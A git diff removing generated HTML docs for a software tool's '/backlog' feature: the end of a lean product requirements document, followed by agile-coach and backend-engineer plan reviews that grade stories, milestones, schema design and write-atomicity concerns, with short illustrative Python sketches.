-  bl --> view["/backlog<br/>(ordered list +<br/>per-entry pipeline status)"]
-  man["manifest.json<br/>(feature index:<br/>research/prd/plan)"] --> view
-  bl --> dec{"User decides<br/>next step"}
-  dec --> research["/research"]
-  dec --> prd["/prd"]
-  dec --> plan["/plan"]
-  dec --> impl["/implement"]
-  man --> rec["Reconcile → remove from backlog:<br/>end of promoted /plan or /implement,<br/>or /backlog sweep (work now in plan.json)"]
-  plan --> rec
-  impl --> rec
-  rec --> bl
-
-

6. Goals & non-goals

-

Goals

-
    -
  • Capture future work (epic / story / task granularity) at any point in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.
  • -
  • Support both capture sources: user-created and agent-discovered.
  • -
  • Keep the backlog ordered so there's a clear "what to pick up next."
  • -
  • Every entry is associated with a feature and an epic — existing or proposed-new — and the agent suggests a matching feature/epic at capture or promotion time.
  • -
  • A /backlog command shows the current backlog, ordered, with each entry's feature + epic association, source, and pipeline status (research / prd / plan, read from manifest.json) — so you can see what's been started (e.g. a prd written) without the entry being removed.
  • -
  • Provide a user-driven promotion path: the user picks an entry and starts the Shield step they judge appropriate (/research, /prd, /plan, or /implement). The backlog suggests, but does not dictate, the next step.
  • -
  • Keep the backlog current: an entry promoted via /plan or /implement is removed at the end of that run; the /backlog view also sweeps out any entry whose work has since landed in a plan.json. The backlog reflects only not-yet-committed work.
  • -
  • Manual remove: any entry can be explicitly removed from /backlog — covers ideas decided against and entries not cleared by a promotion run.
  • -
-

Non-goals

-
    -
  • Automatic end-of-task surfacing machinery (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.
  • -
  • Per-feature backlogs. v1 is a single global backlog.
  • -
  • A status/workflow engine. The lifecycle is minimal: an entry exists until it is removed — at the end of the /plan or /implement it was promoted from, by the /backlog sweep once its work is in a plan.json, or manually. No multi-state machine.
  • -
  • Syncing the backlog to the PM tool (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing /pm-sync on the resulting plan.
  • -
  • Replacing the PM tool's own backlog. This is Shield-local triage, not a project-management backlog of record.
  • -
-

7. Success metrics

| Metric | Type | Target | Counter |
|---|---|---|---|
| Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot | Outcome | ≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; <20% sit untouched >60 days | Entries pile up un-triaged → backlog becomes a graveyard |
| Entries carrying a feature + epic association at promotion time | Quality | 100%; promotion cannot complete without a feature and epic | Forcing association makes capture so heavy nobody captures |
| Agent feature/epic-suggestion acceptance | Quality | ≥60% of agent feature/epic suggestions accepted without override | Bad suggestions that users routinely override |
| Capture friction | Adoption | Capture is a single /backlog add (or one agent action) and never blocks the current task | Capture is so quick the backlog fills with low-signal noise |
-

Measurement (v1): no telemetry — metrics are tracked manually via a periodic /backlog audit and the git history of backlog.json (entry add/remove commits). Owner: @ashwinimanoj.

-

8. Milestones

| ID | Name | Outcome | Exit criteria | Depends on |
|---|---|---|---|---|
| M1 | Capture + store + view | A global backlog.json exists; entries can be added (user + agent) with order, source, and feature + epic association; /backlog shows the ordered list with per-entry pipeline status from manifest.json | backlog.json schema defined; an entry can be captured from a skill or by the user; /backlog renders the ordered backlog with feature + epic and a research/prd/plan status read from manifest.json; an entry can be manually removed from /backlog | |
| M2 | Feature + epic association + suggestion | Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic | Capture prompts for a feature + epic; agent scans manifest.json features and known epics and proposes a match; user can accept, pick another, or create-new | M1 |
| M3 | Promotion + reconciliation | The user picks an entry and starts the Shield step they choose (/research, /prd, /plan, or /implement); once the entry's epic's work appears in the feature's plan.json, it is removed from the backlog | Reconciliation uses manifest.json (find feature, has-plan?) + plan.json (epic present?), with no ids stamped; a prd-only feature is not removed; removal fires eagerly at the end of the /plan or /implement run promoted from the entry and lazily on the /backlog sweep; the user-chosen step is never overridden | M2 |
-

9. Open questions

-

Decided (locked for v1)

-
    -
  • Reconciliation triggers: an entry is removed (a) eagerly at the end of the /plan or /implement run it was promoted from — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) lazily by the /backlog view sweep, which prunes any entry whose epic's work is now in a plan.json (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into plan.json.
  • -
  • Reconciliation match key: feature (via manifest.json) + epic. Existing-epic entries match by epic id; proposed-new-epic entries match by epic name (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.
  • -
  • Ordering scheme: a single explicit integer order field per entry (like orderindex); no priority buckets in v1.
  • -
  • Entry granularity: entries carry a kind hint (epic | story | task); promotion always yields ≥1 story regardless of kind.
  • -
  • Shippable work routes through /plan: anything that produces stories is promoted via /plan so it lands in plan.json (the lazy-sweep signal) and is pruned at the end of that /plan run. Direct /implement stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the /implement run too.
  • -
  • Manual remove: /backlog supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.
  • -
-

Still open

-
    -
  • Feature/epic discovery cost. Epics live inside per-feature plan.json, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged plan.json files; add a project-level epic index only if this gets slow.)
  • -
  • Dropped/rejected entries. Do we need an explicit terminal state for "decided against," or is deleting the entry enough? (Deferred — see §11 Out of scope.)
  • -
-

10. Risks & assumptions

-

Risks

| Risk | Mitigation | Owner |
|---|---|---|
| Backlog becomes a graveyard (captured, never acted on) | Reconciliation prunes plan-committed work on /backlog view; periodic audit surfaces stale entries; §7 counter-metric tracks it | @ashwinimanoj |
| Concurrent writes corrupt backlog.json (capture racing reconciliation) | Atomic write (temp-then-rename); validate-or-refuse on read; backlog.json is git-tracked so corruption is revertable | @ashwinimanoj |
| Reconciliation wrongly removes an entry (epic-name collision / ambiguous match) | Match on feature + epic only; never remove on ambiguity (entry stays); git revert recovers any bad removal | @ashwinimanoj |
| Capture friction too high → nobody captures | Single-step capture; agent can capture without prompting | @ashwinimanoj |
-
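
The "atomic write (temp-then-rename); validate-or-refuse on read" mitigation in the risk table can be sketched roughly as follows. This is a minimal illustration, not the plan's actual helper: the names `load_or_refuse`, `atomic_write_json`, and `BacklogInvalid`, and the empty-document default with `schema_version` 1, are assumptions made for the example.

```python
import json
import os
import tempfile
from pathlib import Path


class BacklogInvalid(Exception):
    """Hypothetical error: backlog.json cannot be trusted, so the caller refuses to use it."""


def load_or_refuse(path: Path) -> dict:
    """Return the parsed backlog, or raise instead of guessing at a bad file."""
    if not path.exists():
        # Assumed default for a backlog that has never been written.
        return {"schema_version": 1, "entries": []}
    try:
        doc = json.loads(path.read_text(encoding="utf-8"))
    except json.JSONDecodeError as exc:
        raise BacklogInvalid(f"unparseable backlog: {exc}") from exc
    if not isinstance(doc, dict) or not isinstance(doc.get("entries"), list):
        raise BacklogInvalid("backlog must be an object with an 'entries' list")
    return doc


def atomic_write_json(path: Path, doc: dict) -> None:
    """Write to a temp file in the same directory, then rename it over the target."""
    fd, tmp_name = tempfile.mkstemp(dir=path.parent, prefix=path.name + ".", suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as tmp:
            json.dump(doc, tmp, indent=2)
            tmp.flush()
            os.fsync(tmp.fileno())  # push the bytes to disk before the rename
        os.replace(tmp_name, path)  # readers see the old file or the new one, never a torn one
    except BaseException:
        # On any failure, remove the temp file so no partial write lingers.
        if os.path.exists(tmp_name):
            os.unlink(tmp_name)
        raise
```

Note that this only guards against torn files. Two writers that each read, modify, and rename can still overwrite one another, which is a separate concern from corruption.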

Assumptions

-
    -
  • (unvalidated) Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.
  • -
  • (unvalidated) The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own backlog.json history will validate it.
  • -
  • (assumed stable) Epic names in plan.json are stable enough to serve as the proposed-new-epic match key (see §9).
  • -
  • (validated) manifest.json is feature-keyed and plan.json carries epics[].stories[] — confirmed against the current schema.
  • -
-

11. Out of scope / Non-goals

-
    -
  • Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).
  • -
  • /pm-sync of backlog entries to the PM tool before promotion.
  • -
  • Cross-project / multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).
  • -
-
-
-

This is a lean PRD. It intentionally omits the following standard sections:

-
    -
  • Section 8 — User stories & scenarios
  • -
  • Section 9 — Functional requirements
  • -
  • Section 10 — Non-functional requirements
  • -
  • Section 11 — RBAC & permissions matrix
  • -
  • Section 12 — Dependencies
  • -
  • Section 13 — Risks & mitigations
  • -
  • Section 14 — Assumptions
  • -
  • Section 15 — Rollout plan (full — lean has its own §8 Milestones)
  • -
  • Section 16 — Cost & resource impact
  • -
  • Section 17 — GTM & customer-comms
  • -
  • Section 18 — Support / CX impact
  • -
-

If scope grows or stakeholders need more detail, run /prd again; Shield will offer to add specific sections or upgrade to standard.

-
- -
-
Generated by Shield
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
deleted file mode 100644
index fa041797..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/agile-coach.html
+++ /dev/null
@@ -1,308 +0,0 @@
Shield Plan Review
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Agile Coach — Detailed Findings

-
-

Back to summary

-
-

Agile Coach Review (Grade: B)

| # | Evaluation Point | Grade | Notes |
|---|---|---|---|
| AC1 | Story sizing | A | Eleven stories, each a coherent single-sprint unit. Schema+validator, capture, view, remove, status badges, association+suggestion, promotion, reconciliation engine, triggers, evals, release each scoped to days not weeks. None trivial, none multi-week. EPIC-3-S2 (reconciliation engine) is the heaviest but still one focused unit. |
| AC2 | Story independence | B | Good parallelism within M1 (S1 schema unblocks S2/S3/S4; S3 view and S4 remove can proceed in parallel once helper exists). EPIC-3-S3 hard-depends on EPIC-3-S2 (shared engine) and EPIC-3-S1 (transient reference): correctly sequenced but tightly coupled; that coupling is inherent, not a defect. |
| AC3 | Dependency ordering | A | Milestone chain M1→M2→M3 is explicit and acyclic. Blockers are stated: EPIC-3-S3 "share the reconciliation engine" depends on EPIC-3-S2; promotion (S1) precedes eager prune (S3); EPIC-2-S1 view-badges build on EPIC-1-S3 view (called out: "Pipeline status badges are added in EPIC-2-S1"). No circular deps. |
| AC4 | Context completeness | A | Every story's description states why it exists, not just what. E.g. EPIC-1-S2 ties to a corruption-race rationale and explicitly "resolves the PRD-review P1 'capture interface undefined'"; EPIC-2-S1 explains the goal ("show 'prd done, not yet planned' without being removed"). Carried-forward PRD-review items mapped to stories. |
| AC5 | Requirements clarity | B | Mostly specific and measurable: named validator errors (unknown_kind_enum, missing_required_field, schema_version_too_new), explicit field list, atomic temp-then-rename. Weaker spot: EPIC-2-S2 "propose the best match" leaves the matching algorithm undefined (no string-distance/heuristic spec), deferred to a TODO LLD epic-suggester. AC6/AC7 partly compensate but the "best match" criterion is not measurable. |
| AC6 | Implementation step quality | B | Steps say what and mostly how (e.g. "write backlog.json.tmp then rename; on failure remove .tmp", "pydantic + jsonschema, run via uv"). Verification is largely pushed into the AC rather than into the steps themselves; e.g. EPIC-3-S2 steps describe behavior but no in-step verification checkpoint. Solid but not exemplary. |
| AC7 | Acceptance criteria testability | B | Most AC are pass/fail verifiable by a third party (exit 0/non-zero with named error; "killing capture mid-write leaves no corrupted backlog.json"; "second pass is a no-op"). Two soft spots: EPIC-2-S2 "proposes ≥1 feature and ≥1 epic candidate when matches exist" (the "best match" quality isn't asserted); EPIC-3-S3 "before the next /backlog view" is a sequencing claim that's awkward to test deterministically. No vague "performance is good"-style criteria. |
| AC8 | Sprint-readiness | B | M1 and M3 stories are pullable as-is. EPIC-2-S2 carries an open design question (suggestion match algorithm, TODO /lld epic-suggester) and PRD §9 flags "Feature/epic discovery cost" as still-open; a dev would need a planning conversation on the matching heuristic before estimating S2 confidently. Everything else is ready. |
| AC9 | Estimation feasibility | B | Nine of eleven stories are confidently estimable. EPIC-2-S2 (undefined match heuristic) and EPIC-3-S2 (match-key + drift-tolerance edge space) carry estimation uncertainty until the LLDs land. All LLD design_refs are unresolved TODO links: fine for a plan, but they're the exact detail an estimator wants. |
| AC10 | Definition of Done alignment | B | Strong on tests (dedicated EPIC-4-S1 eval story with RED→GREEN, CI wiring, self-contained no-LLM fixtures) and docs (EPIC-4-S2: command + SKILL + CHANGELOG) and release (version bump per CLAUDE.md). Not stated anywhere: code review and deploy/ship-to-staging steps in the DoD. For a plugin-asset repo "staging" maps loosely to the marketplace bump, but review is unmentioned. |
| AC13 | Milestone coverage | A | All three milestones have covering stories. M1: EPIC-1-S1/S2/S3/S4 + EPIC-2-S1 (5). M2: EPIC-2-S2 (1). M3: EPIC-3-S1/S2/S3 + EPIC-4-S1/S2 (5). No empty milestone. |
| AC14 | Milestone reference integrity | A | Every story milestone_id is M1, M2, or M3, all present in milestones[]. No null, no dangling reference. milestones[] non-empty. |
| AC15 | Milestone exit criteria testability | B | Most exit criteria are testable facts (validator exits 0/non-zero with named error; atomic temp-then-rename; "a prd-only feature is NOT removed"; "second pass is idempotent"). M2's "proposes ≥1 candidate ... using a documented match" leans on an undocumented match (mirrors the EPIC-2-S2 AC5/AC8 gap). M1's "renders ... a research/prd/plan status read from manifest.json" is verifiable. Overall testable with one soft item. |
| AC16 | Milestone DAG integrity | A | Graph: M1→(M2), M2→(M3). Linear, acyclic, fully connected. No cycle, no dangling depends_on (M1 deps [], M2 deps [M1], M3 deps [M2]). |
-

Key Finding: A well-structured, sprint-ready backlog with an acyclic milestone DAG and full coverage; the single recurring weakness is the undefined feature/epic suggestion-matching heuristic (EPIC-2-S2 / M2), which is still an open question and undercuts requirements clarity, sprint-readiness, and estimability for that one story.

-

Story-Level Assessment

| Story | Sizing | Has Context | Has Requirements | Has Steps | Has Criteria | Sprint-Ready? |
|---|---|---|---|---|---|---|
| EPIC-1-S1 · Schema + validator | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-1-S2 · Capture (user+skill) atomic write | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-1-S3 · /backlog ordered view | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-1-S4 · Manual remove | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-2-S1 · Pipeline status from manifest | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-2-S2 · Feature+epic association + suggestion | OK | Yes | Partial (match heuristic undefined) | Partial | Partial ("best match" not asserted) | No |
| EPIC-3-S1 · Promotion (transient reference) | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-3-S2 · Reconciliation engine | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-3-S3 · Eager + lazy triggers (idempotent) | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-4-S1 · Executable evals (RED→GREEN) | OK | Yes | Yes | Yes | Yes | Yes |
| EPIC-4-S2 · Version bump + docs | OK | Yes | Yes | Yes | Yes | Yes |
-

Milestone-Level Assessment

| Milestone | Has Covering Stories | Exit Criteria Testable | Depends-On Valid |
|---|---|---|---|
| M1 · Capture + store + view | Yes (5: E1-S1..S4, E2-S1) | Yes | Yes (root, deps []) |
| M2 · Feature + epic association + suggestion | Yes (1: E2-S2) | Partial ("documented match" undefined) | Yes (deps M1) |
| M3 · Promotion + reconciliation | Yes (5: E3-S1..S3, E4-S1, E4-S2) | Yes | Yes (deps M2) |
-

Note on milestone/epic phase alignment: EPIC-2-S1 carries milestone_id: M1 while sitting in EPIC-2 ("Association & pipeline status"). This is intentional and correct, not a conflict — the story implements the manifest status badge, which M1's outcome explicitly includes ("/backlog renders the ordered list ... with per-entry pipeline status from manifest.json"). The epic groups by theme; the milestone groups by ship-phase. They legitimately cross here. No remediation needed.

-

Recommendations

| Priority | Point | Recommendation |
|---|---|---|
| P1 | AC5 / AC7 / AC8 (EPIC-2-S2) | Define the feature/epic suggestion match heuristic before the story enters a sprint: specify the matching method (e.g. case-insensitive substring + token-overlap ranking on feature/epic names) and add a measurable AC such as "given fixture manifest with feature auth, capturing text mentioning 'auth' surfaces auth as the top candidate." Resolve the PRD §9 open "Feature/epic discovery cost" question or land the TODO /lld epic-suggester so S2 is estimable. |
| P2 | AC15 (M2) | Tighten M2's exit criterion "using a documented match": point it at the resolved heuristic above and restate as a testable fact, mirroring the M3 exit criteria's precision. |
| P2 | AC10 | Add code-review and ship/staging steps to the implied Definition of Done. EPIC-4-S2 covers version bump + docs + CHANGELOG; add "PR reviewed and merged; marketplace version published" as an explicit DoD line so 'done' is unambiguous across the team. |
| P2 | AC9 | The LLD design_refs for EPIC-1-S1, EPIC-1-S2, EPIC-2-S2, EPIC-3-S2, EPIC-3-S3 are all unresolved TODO links. Land (or stub) /lld backlog-store, /lld epic-suggester, and /lld reconciler before sprint start so estimators have the interface-level detail those stories reference. |
-
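
The P1 recommendation names "case-insensitive substring + token-overlap ranking" only as an example method. One way that could look is sketched below; the function names `tokens` and `rank_candidates` and the exact scoring order are assumptions for illustration, not a heuristic the plan has adopted.

```python
import re


def tokens(text: str) -> set[str]:
    """Lowercased alphanumeric tokens, e.g. 'auth-tokens' -> {'auth', 'tokens'}."""
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def rank_candidates(text: str, names: list[str]) -> list[str]:
    """Rank feature/epic names against captured text.

    Names that appear as a case-insensitive substring of the text sort first,
    then names ordered by how many tokens they share with the text.
    Names with neither signal are dropped, so an empty list means "no suggestion".
    """
    text_lower = text.lower()
    text_tokens = tokens(text)
    scored = []
    for name in names:
        is_substring = name.lower() in text_lower
        overlap = len(tokens(name) & text_tokens)
        if is_substring or overlap:
            # Tuple sorts substring hits first, then higher overlap, then name.
            scored.append((not is_substring, -overlap, name))
    return [name for _, _, name in sorted(scored)]


print(rank_candidates("Add token refresh to auth", ["billing", "auth", "auth-tokens"]))
# -> ['auth', 'auth-tokens']
```

A substring test is deliberately loose (a feature named "auth" would also match text containing "author"), so a real heuristic would likely need a tie-break or ambiguity rule on top of this.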

Overall Persona Grade: B (point average ≈ 3.43 across 14 evaluation points: six A at 4 and eight B at 3 give 48/14, which rounds to B). The plan is sprint-ready with strong context, an acyclic and fully-covered milestone DAG, and testable criteria throughout. The one consistent drag is the under-specified suggestion-matching in EPIC-2-S2 / M2, which a single planning clarification (P1) would lift to A-range.

diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
deleted file mode 100644
index 234e66d5..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
+++ /dev/null
@@ -1,113 +0,0 @@
Shield Plan Review
Shield Plan Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/plan/2026-05-27/)
-

Backend Engineer — Detailed Findings

-
-

Back to summary

-
-

Backend Reviewer — Plan Review: Shield Backlog

-

Scope: plan.md, trd.md, plan.json (4 epics / 11 stories / 3 milestones), grounded against shield/schema/plan-sidecar.schema.json and docs/shield/manifest.json.
Stack: Python (uv), JSON-schema deliverables, command/skill markdown. No framework skills apply.

-

Scorecard

| # | Evaluation Point | Grade | Basis |
|---|---|---|---|
| 1 | Data contract / schema design | B | backlog.json contract is fully specified (§11, F1, EPIC-1-S1): {schema_version:int, entries:[{id, order:int, kind, source, feature, epic, text}]}, draft-2020-12, named errors. Gap: id has no type/format/uniqueness rule, and the id generation strategy is undefined (see P1-a). epic/feature typed only as bare strings with no "proposed-new vs existing" discriminator. |
| 2 | API / interface design | C | The skill-facing write-helper (explicitly the carried-forward PRD-review P1) is still open (Q3: "exact function signature / module location … Resolution: lock in /lld backlog-store or at EPIC-1-S2 implementation"). §11 describes it only as "documented function/contract taking {text, kind, feature?, epic?, source}; returns the created entry id." Deferring the signature of the one cross-skill contract to implementation time is the central interface risk (P1-b). |
| 3 | File I/O correctness & atomicity (N1) | B | Strong: temp-then-rename + validate-or-refuse, crash leaves at most .tmp cleaned next run, git-tracked recoverability (N1, N4, EPIC-1-S2). Gaps: (a) no fsync/os.replace durability detail: "rename" on POSIX via os.replace is atomic but the plan doesn't name the primitive; (b) no concurrency primitive named: N1 claims "concurrent capture racing reconciliation must never corrupt" but temp-then-rename alone does not prevent lost updates (two writers each read-modify-rename → last-writer-wins drops an entry). No lock/CAS/re-read-under-lock mentioned (P1-c). |
| 4 | Error handling | A | Consistently specified: named validator errors (unknown_kind_enum, missing_required_field, schema_version_too_new), absent-id no-op, empty-backlog message, malformed-upstream → entry-stays-with-log, never-crash (N3, F5, §9). Degradation paths are explicit and testable. |
| 5 | Testing strategy | A | EPIC-4-S1 mandates self-contained executable evals (no API/LLM) under shield/evals/, named fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays), RED→GREEN in PR, CI gate. Directly satisfies CLAUDE.md eval mandate. One missing case: no eval for the lost-update concurrency path (ties to P1-c) and none for schema_version_too_new migration. |
| 6 | Framework / idiom fit | A | Correct for the repo: uv-run scripts, pydantic+jsonschema, schema at shield/schema/, skill at shield/skills/general/backlog/, command at shield/commands/, version bump in marketplace.json + pyproject (EPIC-4-S2). Matches existing validate_*/reconcile_* script conventions. |
-
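
To make the contract in row 1 and the named errors in row 4 concrete, here is a rough validator sketch. It is dependency-free plain Python rather than the pydantic + jsonschema stack the plan names, and several details are assumptions for illustration: the supported version being 1, the `code:location` error format, and the `duplicate_id` code (which only reflects the uniqueness rule this review asks for, not anything the plan defines).

```python
SUPPORTED_SCHEMA_VERSION = 1  # assumption: v1 is the only version that exists
KINDS = {"epic", "story", "task"}
REQUIRED = ("id", "order", "kind", "source", "feature", "epic", "text")


def validate_backlog(doc: dict) -> list[str]:
    """Return named error codes; an empty list means the document is accepted."""
    errors = []
    version = doc.get("schema_version")
    if not isinstance(version, int):
        errors.append("missing_required_field:schema_version")
    elif version > SUPPORTED_SCHEMA_VERSION:
        errors.append("schema_version_too_new")

    seen_ids = set()
    for i, entry in enumerate(doc.get("entries", [])):
        for field in REQUIRED:
            if field not in entry:
                errors.append(f"missing_required_field:entries[{i}].{field}")
        if "kind" in entry and entry["kind"] not in KINDS:
            errors.append(f"unknown_kind_enum:entries[{i}]")
        entry_id = entry.get("id")
        if entry_id is not None:
            if entry_id in seen_ids:
                # Hypothetical code: the plan does not yet define a uniqueness rule.
                errors.append(f"duplicate_id:entries[{i}]")
            seen_ids.add(entry_id)
    return errors
```

A caller would treat any non-empty result as a refusal, which matches the validate-or-refuse behavior the scorecard credits under file I/O.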

Schema-grounding check (read-contract, N3 / §11): I verified the consumed shapes against the live files. manifest.json is features[].{name, artifacts.{research,prd,plan_json,...}}; §11 is accurate. plan-sidecar.schema.json has epics[].{id (^EPIC-[0-9]+$), name, stories[]} with story.status ∈ {ready,in-progress,in-review,done,blocked}; §11's epics[].{id,name,stories[]} is accurate. The read-contract claim is correct, which lifts N3 from a guess to a verified coupling. Good.

-
-

Prioritized Recommendations

-

P1 — Important gaps (C/incomplete on important points):

-
    -
  • -

    P1-a · id contract underspecified (Eval point 1). F1 / §11 / the schema task list id as a required field but never define its type, format, or how it's generated. Manual-remove (/backlog remove <id>), promotion (promote <id>), and eager-prune all key off id, yet uniqueness and collision behavior are unstated. Action: in EPIC-1-S1, specify id type (string?), generation (uuid4 / monotonic / slug), and a uniqueness constraint in the schema. Add an AC: "schema rejects duplicate id."

    -
  • -
  • -

    P1-b · The write-helper signature is still open: a P0-shaped risk parked as Q3 (Eval point 2). This is the exact PRD-review P1 the plan claims to resolve in EPIC-1-S2, but §11 + Q3 punt the signature to "/lld or implementation." Since EPIC-1-S2 is the contract every capturing skill builds against, an unspecified signature means downstream skills can't be written or tested against a stable shape. Action: lock the helper signature (name, module path, params, return, raise-on-invalid behavior) in EPIC-1-S1/S2 acceptance criteria, not deferred to LLD. At minimum pin: capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id and where it lives (shield/scripts/backlog_store.py?).

    -
  • -
  • -

    P1-c · Atomicity ≠ isolation; lost-update path unaddressed (Eval point 3, N1). N1's threat model is "concurrent capture racing reconciliation." Temp-then-rename guarantees no torn file, but two concurrent read-modify-write cycles still silently drop one writer's entry (both read N entries, each writes N+1, second rename wins → one entry lost, no corruption flagged). The plan treats "no corruption" as equivalent to "no data loss." Action: name the concurrency strategy: either a single-writer assumption documented as such, or a lockfile / re-read-and-merge under exclusive open / O_EXCL temp. Add an eval fixture for two interleaved captures. If single-actor is the real assumption (N5 says "single actor"), state it explicitly in N1 and downgrade the "racing reconciliation" language, because eager-prune-at-end-of-/plan can genuinely run while an agent captures.

    -
  • -
-
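
As one possible shape for the lockfile option in P1-c, the sketch below wraps the whole read-modify-write cycle in an `O_EXCL` lockfile so that concurrent captures cannot drop each other's entries. Everything here is illustrative: `exclusive_lock`, this simplified `capture` signature, the `.lock` file name, the uuid4 id scheme, and the append-at-end ordering are assumptions, not decisions recorded in the plan.

```python
import json
import os
import threading
import time
import uuid
from contextlib import contextmanager
from pathlib import Path


@contextmanager
def exclusive_lock(lock_path: Path, timeout: float = 5.0):
    """Hold a lockfile created with O_EXCL; creation fails while another holder exists."""
    deadline = time.monotonic() + timeout
    while True:
        try:
            fd = os.open(lock_path, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
            break
        except FileExistsError:
            if time.monotonic() > deadline:
                raise TimeoutError(f"could not acquire {lock_path}")
            time.sleep(0.01)
    try:
        yield
    finally:
        os.close(fd)
        os.unlink(lock_path)


def capture(path: Path, text: str, *, kind: str = "task", source: str = "user") -> str:
    """Append one entry; the read, the modification, and the rename all run under the lock."""
    with exclusive_lock(path.with_suffix(".lock")):
        if path.exists():
            doc = json.loads(path.read_text(encoding="utf-8"))
        else:
            doc = {"schema_version": 1, "entries": []}
        entry_id = uuid.uuid4().hex  # hypothetical id scheme
        doc["entries"].append(
            {"id": entry_id, "order": len(doc["entries"]) + 1,
             "kind": kind, "source": source, "text": text}
        )
        tmp = path.with_suffix(".json.tmp")
        tmp.write_text(json.dumps(doc, indent=2), encoding="utf-8")
        os.replace(tmp, path)  # temp-then-rename, as in N1
    return entry_id
```

A stale lockfile left by a crashed process would block later writers until the timeout, so a real implementation would need a recovery rule for that case. The interleaved-capture eval the review asks for could start several threads or processes calling `capture` and assert that every entry survives.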

P2 — Warnings / minor gaps on B items:

-
    -
  • -

    P2-a · "Epic landed" gate is ambiguous (Eval points 1 and 5, F7). F7 says remove "when its epic's work appears in the feature's plan.json," EPIC-3-S2 AC says "whose epic's stories appear," but the schema guarantees an epic always has stories[] (minItems:1) the moment it's written. So "stories appear" = "epic exists", meaning an entry is pruned as soon as /plan writes the epic, regardless of whether any story is done. That may be intended (plan-committed = removed) but it's stated three slightly different ways. Action: state the gate as one precise predicate, e.g. "epic with matching id/name is present in plan.json.epics[]", and explicitly note story status is not consulted. Removes reviewer ambiguity and pins the eval assertion.

    -
  • -
  • -

    P2-b · Proposed-new "match by epic name" fragility is acknowledged but not bounded (Eval point 2). Match key for proposed-new epics is epic name with "names expected stable" as an unvalidated assumption (PRD §10). The mitigation (§14: "disable eager prune on repeated name collisions") is reactive. Action: add normalization rules to EPIC-3-S2 (case/whitespace-insensitive? exact?) and an AC for the collision case ("two epics same normalized name → ambiguous → entry stays"), which the "ambiguous-stays" fixture should already exercise; wire it explicitly to name-collision, not just structural ambiguity.

    -
  • -
  • -

    P2-c · schema_version migration is policy-only, no executable path (Eval points 1 and 5). The read-old/write-new policy is documented but EPIC-1-S1 only validates schema_version_too_new (reject). There's no migration function or eval for read-old. Acceptable for v1 (only one version exists), but the AC overstates ("migration policy present" = a doc, not code). Action: either add a no-op migrate(doc)->doc seam now with a test, or explicitly scope migration as doc-only-until-v2 in the AC so it isn't mistaken for working code.

    -
  • -
-
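
The single predicate that P2-a asks for, combined with the normalization and collision rule from P2-b, might be sketched as follows. This is an assumption-heavy illustration: the function names, the casefold-and-collapse-whitespace normalization, and the convention that an entry's `epic` string matching the schema's id pattern is an existing-epic reference (anything else being a proposed-new name) are all invented for the example, since the plan defines no discriminator.

```python
import re

# Id pattern as quoted in this review from plan-sidecar.schema.json.
EPIC_ID = re.compile(r"^EPIC-[0-9]+$")


def normalize(name: str) -> str:
    """Assumed normalization: case-insensitive, whitespace-collapsed."""
    return " ".join(name.casefold().split())


def epic_landed(entry: dict, plan: object) -> bool:
    """True only when exactly one epic in plan['epics'] matches the entry's epic.

    Story status is never consulted: presence of the epic is the whole gate.
    """
    try:
        epics = plan["epics"]
        ref = entry["epic"]
        if EPIC_ID.match(ref):
            hits = [e for e in epics if e["id"] == ref]
        else:
            hits = [e for e in epics if normalize(e["name"]) == normalize(ref)]
    except (KeyError, TypeError, AttributeError):
        return False  # malformed upstream shape: the entry stays
    return len(hits) == 1  # no match or several matches both mean "stay"


plan = {"epics": [
    {"id": "EPIC-1", "name": "Capture", "stories": [{"status": "ready"}]},
    {"id": "EPIC-2", "name": "Auth  Flow", "stories": [{"status": "ready"}]},
    {"id": "EPIC-3", "name": "auth flow", "stories": [{"status": "done"}]},
]}
print(epic_landed({"epic": "EPIC-1"}, plan))     # True: id present
print(epic_landed({"epic": "Auth Flow"}, plan))  # False: two epics share the normalized name
```

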